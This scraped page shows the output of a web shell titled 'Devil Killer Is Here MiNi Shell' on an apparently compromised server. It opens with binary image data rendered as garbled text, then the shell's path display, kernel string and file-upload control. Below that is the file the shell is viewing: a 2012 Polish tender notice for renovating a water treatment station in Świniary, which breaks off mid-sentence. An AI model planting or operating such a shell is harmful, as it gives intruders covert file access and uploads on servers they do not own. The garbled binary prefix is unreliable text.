JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120412/114860-N-2012.html

<p class="kh_header"><b>Skwierzyna: Remont  stacji uzdatniania wody w miejscowości Świniary z wprowadzeniem uzdatnienia wody podawanej do wodociągu publicznego</b><br>
<b>Numer ogłoszenia: 114860 - 2012; data zamieszczenia: 12.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Wodociągów i Kanalizacji spółka z o.o. , ul. Chrobrego 5, 66-440 Skwierzyna, woj. lubuskie, tel. 0-95 7172027, faks 0-95 7171541.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zwik.skwierzyna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o.o. z 100 % udziałem Gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont  stacji uzdatniania wody w miejscowości Świniary z wprowadzeniem uzdatnienia wody podawanej do wodociągu publicznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont  stacji uzdatniania wody w miejscowości Świniary z wprowadzeniem uzdatnienia wody podawanej do wodociągu publicznego
1. Ogólny zakres rzeczowy przedsięwzięcia:
W ogólny zakres rzeczowy przedsięwzięcia wchodzi wykonanie robót budowlanych i montażowych w następującym zakresie:
a) w części zewnętrznej obiektu: 
   -wymiany istniejącego pokrycia dachowego z papy termozgrzewalnej z 
     wykonaniem ocieplenia dachu styropianem grubości 15 cm i wykonanie nowego     
     pokrycia z papy termozgrzewalnej;  
    -ocieplenie ścian elewacji budynku styropianem grubości 12 cm i pokrycie tynkiem  
      cienkowarstwowym -  budynek o maksymalnej wysokości w szczycie 4,3 m;
    -wymiana istniejącej stolarki okiennej drewnianej - okna uchylne jednodzielne o    
     wymiarach:  0,92 x 1,15 m - szt. 7 oraz 0,6 x 1,15 m - szt.1 na  okna uchylne 
     jednodzielne z PVC z zachowaniem tych samych wymiarów;
   -wymiana istniejącej stolarki drzwiowej - 1 szt. drzwi zewnętrznych pełnych    
     dwuskrzydłowych o wymiarach 1,8 x 2,1 m wykonanych z kątowników 
     stalowych obitych blachą na drzwi zewnętrzne płycinowe pełne dwuskrzydłowe o 
     tych samych wymiarach;
b)  w części wewnętrznej budynku: 
    -remont pomieszczeń, w tym: wyburzenie ścianki działowej, naprawa powierzchni 
     ścian, sufitu i posadzki, ułożenie na ścianach glazury do wysokości 2,0 m - 
     powyżej malowanie farbą emulsyjną, wymiana wewnętrznej stolarki drzwiowej, 
     ułożenie terakoty na posadzce, malowanie sufitu;
   -wymiana wyposażenia, wymiana instalacji elektrycznej,  instalacja urządzeń 
    zautomatyzowania stacji uzdatniania wody, automatyzacja procesów obsługowych 
    urządzeń stacji wodociągowej, wprowadzeniem zdalnej sygnalizacji pracy 
    urządzeń oraz sygnalizacji wejścia osób niepowołanych na teren stacji 
    wodociągowej;
  -wymiana wyposażenia i uzbrojenia ujęć, remont i  wyposażenie obudowy studni i  
    wykonanie opaski betonowej;
c) elementów zagospodarowania terenu;
  -wymiana istniejącego ogrodzenia z siatki z bramą wjazdową i furtką na ogrodzenie 
    z siatki wysokości 1,5 m  na słupkach stalowych z  rur średnicy 70 mm o 
    rozstawie 2,1 m obsadzonych w gruncie i zabetonowanych;
  -montaż bramy z furtką wysokości 1,6 m, szerokość bramy 3 m i furtki 1m z siatki w 
    ramach stalowych na gotowych słupkach;
  -utwardzenie powierzchni działki - remont dojść i   dojazdu do obiektu - wykonanie 
   dojazdu i chodnika do obiektu o nawierzchni typu POLBRUK na podbudowie z 
   kruszywa łamanego stabilizowanego mechanicznie.
d) Wykonawca w ramach Zadania Inwestycyjnego zobowiązany jest również do 
    wykonania Zadań Towarzyszących:
  -rozruchu technologicznego stacji,
  -opracowania niezbędnej instrukcji (eksploatacji, stanowiskowych, bhp),
  -wykonania niezbędnych analiz wody w zakresie monitoringu przeglądowego przez 
    akredytowane  laboratorium potwierdzające spełnienie wymogów jakości wody 
    przeznaczonej do spożycia przez ludzi wynikających z rozporządzenia Ministra 
    Zdrowia z dnia 29 marca 2007 r.
  -wykonanie analizy wód popłucznych przez akredytowane laboratorium.
  -wykonania dokumentacji powykonawczej.

2.   Szczegółowy zakres rzeczowy przedsięwzięcia określony jest w dokumentacji technicznej:
a)  projekcie budowlanym wykonawczym, z częścią opisową, mapami i rysunkami 
     do projektu wykonawczego branża sanitarna, branża budowlana, branża 
     elektryczna,
b)  przedmiarem robót, 
c)  kosztorysem nakładczym branża budowlana,
d)  kosztorysem nakładczym branża instalacyjna, 
e)  kosztorysem nakładczym - wymiana ogrodzenia,
f)   kosztorysem nakładczym - droga wewnętrzna z chodnikiem 
g)  specyfikacją techniczną wykonania i odbioru Robót Budowlanych,
h)  projekcie umowy, 
i)   SIWZ.
2.0. Wymagania Zamawiającego w stosunku do przedmiotu zamówienia.
Zamawiający wymaga, aby każde z urządzeń było wyprodukowane w całości przez jednego producenta (nie dopuszcza się samodzielnego montażu urządzeń z podzespołów przez Wykonawcę robót na etapie modernizacji SUW).  Nie dopuszcza się zastosowania urządzeń prototypowych i testowanych.
3. Przepisy prawne związane z przedmiotem zamówienia opisane w rozdziale III pkt 3  
   SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.33.00.00-9, 45.31.00.00-3, 45.40.00.00-1, 45.34.00.00-2, 45.23.32.00-1, 45.23.24.30-5, 45.23.10.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Informacje na temat zamieszczone są w rozdziale X SIWZ.
1.Oferta musi być zabezpieczona wadium w wysokości 5.000,00 zł (słownie: pięć 
   tysięcy  złotych 00/100)
2.Wadium musi obejmować okres związania ofertą: 30 dni (bieg terminu związania 
   ofertą rozpoczyna się wraz z upływem terminu składania ofert).

UWAGA. Przedłużenie terminu składania ofert spowoduje, że wszelkie prawa i zobowiązania Zamawiającego i Wykonawcy odnośnie ww. ustalenia będą podlegały - odpowiednio - nowym terminom. 

3.Termin wniesienia wadium upływa wraz z terminem składania ofert, o godzinie 
   wyznaczonej na składanie ofert. 
4.Wykonawca, który nie wniesie wadium w wymaganym terminie, w tym również na 
   przedłużony okres związania ofertą, lub nie zgodzi się na przedłużenie okresu 
   związania ofertą zostanie przez Zamawiającego wykluczony z ubiegania się o 
   udzielenie zamówienia publicznego.
5.Wadium można wnieść w formie:
   a)pieniężnej,
   b)poręczeniach bankowych,
   c)gwarancji bankowej,
   d)gwarancji ubezpieczeniowej,
   e)poręczenia bankowego,
   f)poręczeń udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 
     ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju 
     Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730   
     i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).

Wadium w formach wymienionych w ppkt b-f musi być wystawione na: Zakład Wodociągów i Kanalizacji Sp. z o.o. w Skwierzynie , ul. Chrobrego 5, 66-440 Skwierzyna , z zapisem : Wadium do przetargu nieograniczonego - Remont  stacji uzdatniania wody w miejscowości Świniary z wprowadzeniem uzdatnienia wody podawanej do wodociągu publicznego.
 
	Oryginał i kopię wadium trzeba dołączyć do oferty.

6.Wadium wnoszone w formie pieniężnej należy wpłacić na rachunek bankowy 
   Zamawiającego nr 22 1240 3594 1111 0010 0974 6098 Bank PKO SA I Oddział w  
   Skwierzynie z dopiskiem: Wadium do przetargu nieograniczonego - Remont stacji 
   uzdatniania wody w miejscowości Świniary z wprowadzeniem uzdatnienia wody 
   podawanej do wodociągu publicznego.
7.Wadium należy wnieść przed terminem składania ofert. W przypadku wnoszenia 
   wadium w formie pieniężnej, za termin jego wniesienia zostanie przyjęty termin 
   uznania rachunku bankowego Zamawiającego (tj. data faktycznego wpływu 
   środków pieniężnych na konto Zamawiającego). 
8.W przypadku wnoszenia wadium w formie gwarancji bankowych lub 
   ubezpieczeniowych beneficjentem gwarancji jest Zamawiający. Umowa 
   gwarancyjna zawarta pomiędzy Gwarantem a Wykonawcą winna określać 
   gwarancję jako nieodwołalną i bezwarunkową w odniesieniu do prawa 
   Zamawiającego do egzekwowania należności bez zwłoki (tzn. na każde pisemne 
   żądanie Zamawiającego nieodwołalnie i bezwarunkowo). 
9. Egzekwowanie wyżej wymieniony należności dotyczy następujących przypadków: 
    a) odmowy przez oferenta do podpisania umowy na warunkach określonych w   
        ofercie,
    b)zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
10.Termin ważności gwarancji stanowiących wadium musi się pokrywać z terminem 
     związania ofertą. 
11. W przypadku wnoszenia wadium w formie poręczenia bankowego niezbędne jest 
     zawarcie umowy pisemnej pomiędzy Poręczycielem, a osobą, na rzecz której 
     poręczenie zostało złożone (tzn. Zamawiającego). Poręczenie dotyczy wypłaty 
     dla  Zamawiającego kwoty wadium nieodwołalnie i bezwarunkowo, na pierwsze  
     pisemne żądanie Zamawiającego odnoszące się do:
     -uchylania się Oferenta od podpisania umowy na warunkach określonych w 
      ofercie,
     -zawarcie umowy stało się niemożliwe z winy Oferenta.
     Termin ważności poręczenia bankowego stanowiącego wadium musi się pokrywać  
     z terminem związania  ofertą. 
12.W przypadku wnoszenia wadium w poręczeniach udzielanych przez podmioty, o 
     których mowa w art. 6 ust. 3 pkt. 4 lit. b ustawy z dnia 9 listopada 2000 r. o 
     utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, podmiot potwierdza 
     wartość poręczenia, co najmniej do wielkości ustalonego wadium. Poręczenie 
     winno być ważne co najmniej do dnia związania ofertą. 
13.Oryginał dokumentu wadium wnoszonego w formie: poręczenia bankowego, 
    gwarancji bankowej lub ubezpieczeniowej lub w poręczeniach, o których w pkt. 9  
    należy zdeponować za potwierdzeniem odbioru w siedzibie Zamawiającego, w 
    kasie, przed upływem terminu wyznaczonego na składanie ofert, zaś kserokopię 
    dowodu wniesienia wadium (potwierdzoną za zgodność z oryginałem) dołączyć do 
    oferty.
14.Wykonawca, który nie złożył wadium w dopuszczonej w niniejszej SIWZ formie i 
    terminie zostanie z postępowania wykluczony.
15.Informacje na temat zwrotu wadium zamieszczono w rozdziale X.2.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunki udziału w postępowaniu  określone zostały na podstawie art. 22 ust. 1 pzp. 
 
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności,  
    jeżeli  ustawy nakładają obowiązek posiadania takich uprawnień;
2. posiadają niezbędną wiedzę i doświadczenie;
3. dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
4. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
    zamówienia;
5.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie 
   art. 24 pzp. oraz spełniają warunki podane w niniejszej Specyfikacji Istotnych 
   Warunków Zamówienia 
5.1. złożą Oświadczenie, że wykonawca spełnia warunki określone w art. 22 ust. 1 
      pzp. oraz nie podlega  wykluczeniu na podstawie art. 24 pzp. - na formularzu 
      ofertowym /zał. Nr 2 i 3 SIWZ/
5.2 Spełnią pozostałe warunki wynikające z rozdziału VII SIWZ.
-Informacje o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w 
 celu potwierdzenia spełnienia wymaganych warunków udziału w postępowaniu 
 określone zostały w rozdziale VIII SIWZ.
-Ocena spełnienia warunków wymaganych od oferentów zostanie dokonana wg  
  formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku, 
  skutkować będzie wykluczeniem wykonawcy. Na potwierdzenie warunków, o   
  których mowa powyżej, Wykonawca musi przedłożyć dokumenty wymienione w 
  Rozdziale VIII SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-Wykonawca dysponować musi osobami posiadającymi uprawnienia i przygotowanie   
 zawodowe do realizacji robót objętych zamówieniem tj. kierowników  
 budowy i robót o specjalności ogólnobudowlanej, instalacyjnej w zakresie sieci,   
 instalacji i urządzeń wodnych i kanalizacyjnych, instalacyjnej w zakresie instalacji i 
 urządzeń elektrycznych. W celu potwierdzenia spełniania niniejszego warunku  
 Wykonawcy zobowiązani są przedłożyć -Personel Wykonawcy - Wykaz osób 
 przewidzianych do wykonania zamówienia- sporządzony na formularzu lub według 
 formularza stanowiącego załącznik nr 6 do  SIWZ oraz  załącznik nr 5 do SIWZ  - 
 Podwykonawcy.
-Wykonawca winien wykazać się należytym wykonaniem w okresie ostatnich pięciu 
 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a 
 jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum trzech 
 prac podobnych do prac objętych przedmiotem zamówienia, 
 Za pracę podobną zamawiający uzna:
 -wybudowanie lub zmodernizowanie co najmniej trzech stacji uzdatniania wody o  
  wydajności układu technologicznego nie mniejszej niż 15 m3/h.
 Wymagane jest także przedstawienie dokumentów (opinii, referencji, protokołów 
 odbioru) potwierdzających zakres wykonanych prac budowlanych oraz należyte  
 wykonanie wykazanych robót.
 Doświadczenie Wykonawcy - Wykaz wykonanych prac sporządzony według 
 formularza stanowiącego załącznik nr 4 do SIWZ.
 Spełnią pozostałe warunki wynikające z rozdziału VII SIWZ.
-Informacje o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w 
 celu potwierdzenia spełnienia wymaganych warunków udziału w postępowaniu 
 określone zostały w rozdziale VIII SIWZ.
-Ocena spełnienia warunków wymaganych od oferentów zostanie dokonana wg  
  formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku, 
  skutkować będzie wykluczeniem wykonawcy. Na potwierdzenie warunków, o   
  których mowa powyżej, Wykonawca musi przedłożyć dokumenty wymienione w 
  Rozdziale VIII SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jeżeli wykonawca udokumentuje swoją wiedzę i doświadczenie w sposób określony w pkt III.3.2. ogłoszenia, potwierdzi tym iż posiada potencjał techniczny umożliwiający wykonanie zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-Wykonawca dysponować musi osobami posiadającymi uprawnienia i przygotowanie   
 zawodowe do realizacji robót objętych zamówieniem tj. kierowników  
 budowy i robót o specjalności ogólnobudowlanej, instalacyjnej w zakresie sieci,   
 instalacji i urządzeń wodnych i kanalizacyjnych, instalacyjnej w zakresie instalacji i 
 urządzeń elektrycznych. W celu potwierdzenia spełniania niniejszego warunku  
 Wykonawcy zobowiązani są przedłożyć -Personel Wykonawcy - Wykaz osób 
 przewidzianych do wykonania zamówienia- sporządzony na formularzu lub według 
 formularza stanowiącego załącznik nr 6 do  SIWZ oraz  załącznik nr 5 do SIWZ  - 
 Podwykonawcy.
 Spełnią pozostałe warunki wynikające z rozdziału VII SIWZ.
-Informacje o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w 
 celu potwierdzenia spełnienia wymaganych warunków udziału w postępowaniu 
 określone zostały w rozdziale VIII SIWZ.
-Ocena spełnienia warunków wymaganych od oferentów zostanie dokonana wg  
  formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku, 
  skutkować będzie wykluczeniem wykonawcy. Na potwierdzenie warunków, o   
  których mowa powyżej, Wykonawca musi przedłożyć dokumenty wymienione w 
  Rozdziale VIII SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenie poprzez przedłożenie potwierdzenia ubezpieczenia od odpowiedzialności cywilnej  w  zakresie   prowadzonej   działalności gospodarczej - suma ubezpieczenia minimum 300.000,00zł.
 Spełnią pozostałe warunki wynikające z rozdziału VII SIWZ.
-Informacje o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w 
 celu potwierdzenia spełnienia wymaganych warunków udziału w postępowaniu 
 określone zostały w rozdziale VIII SIWZ.
-Ocena spełnienia warunków wymaganych od oferentów zostanie dokonana wg  
  formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku, 
  skutkować będzie wykluczeniem wykonawcy. Na potwierdzenie warunków, o   
  których mowa powyżej, Wykonawca musi przedłożyć dokumenty wymienione w 
  Rozdziale VIII SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty określone w rozdziale VIII SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:
1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany. 
2. Zamawiający przewiduje możliwość dokonania zmian w treści umowy w następujących przypadkach:
a) w sytuacjach, których nie można było przewidzieć w chwili zawarcia umowy, a nie 
    powstałych z winy Zamawiającego lub Wykonawcy, 
b) konieczności wprowadzenia zmian wynikających z przekształcenia stron umowy 
    bądź zmiany osób uprawnionych do występowania w imieniu stron,
c)  zmiany stawki podatku VAT,
d)  zmiany terminu wykonania umowy z przyczyn:
    -wstrzymania przez Zamawiającego całości lub części Robót Budowlanych bądź 
      Zadań Towarzyszących,
     -działania Siły Wyższej;
     -wystąpienie intensywnych, ciągłych opadów śniegu lub deszczu przez okres 
      minimum 2 (dwóch) dni roboczych uniemożliwiających wykonanie Robót 
      Budowlanych zgodnie z technologią i sztuką budowlaną oraz wystąpienia  
      przez okres 2 (dwóch) dni roboczych temperatury poniżej 5o C podczas 
      wykonywania prac konstrukcyjnych i zewnętrznych; 
    -opóźnienia Zamawiającego w podejmowaniu decyzji, do których podjęcia obliguje 
      go Umowa;
     -wystąpienie błędów projektowych skutkujących wstrzymaniem wykonywania 
      Robót Budowlanych lub całego Zadania Inwestycyjnego mających bezpośredni 
      wpływ na terminowe wykonanie całości Robót Budowlanych;
     -wystąpienia Robót Zamiennych/Robót Dodatkowych związanych z realizacją 
      zamówienia podstawowego, mających wpływ na uzgodniony termin zakończenia 
      jej realizacji.
  e) zmian dokumentacji projektowej, 
  f)  niezrealizowanie pełnego zakresu prac wraz z odpowiednim zmniejszeniem 
      wynagrodzenia umownego, 
  g) gdy zmiany będą korzystne dla Zamawiającego i nie będą: 
     -wprowadzane warunki, które gdyby zostały ujęte w ramach procedury 
       przetargowej udzielenia zamówienia umożliwiłyby dopuszczenie innych ofert niż 
       ta, która została pierwotnie dopuszczona, 
     -modyfikowały równowagi ekonomicznej umowy na korzyść Wykonawcy w 
      sposób, który nie był przewidziany w postanowieniach pierwotnego zamówienia.
3.Wykonawca zobowiązany jest niezwłocznie, a nie później niż w ciągu 4 (czterech) 
   dni, zawiadomić Zamawiającego na piśmie przesłanym za pośrednictwem telefaksu 
